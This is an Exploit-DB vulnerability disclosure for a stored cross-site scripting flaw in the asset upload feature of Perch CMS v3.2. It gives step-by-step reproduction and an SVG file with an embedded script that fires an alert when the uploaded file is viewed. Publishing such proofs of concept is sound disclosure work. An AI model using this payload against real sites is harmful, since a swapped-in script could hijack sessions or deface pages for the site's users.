Perch v3.2 - Persistent Cross Site Scripting (XSS)

EDB-ID:

51627

CVE:

N/A




Platform:

PHP

Date:

2023-07-28


# Exploit Title: Perch v3.2 - Persistent Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 23-July-2023
# Exploit Author: Dinesh Mohanty
# Vendor Homepage: https://grabaperch.com/
# Software Link: https://grabaperch.com/download
# Version: v3.2
# Tested on: Windows
# CVE : Requested

# Description:
Stored Cross Site Scripting (Stored XSS) Vulnerability is found in the file upload functionally under the create asset section.

#Steps to Reproduce

User needs to login into the application and needs to follow below steps:

1. Login into the application
2. From the left side menu go to Assets (http://URL/perch/core/apps/assets/)
3. Click on "Add assets" and fill all other details (Please note not all the text fields are vulnerable to XSS as they have output encoding)
4. Create the SVG file with below contents say xss.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS");
  </script>
</svg>

4. In the File upload section upload the above SVG file and submit
5. Now go to above SVG directly say the file is xss.svg
6. go to svg file (http://URL/perch/resources/xss.svg) or you can view all Assets and view the image
7. One can see that we got an XSS alert.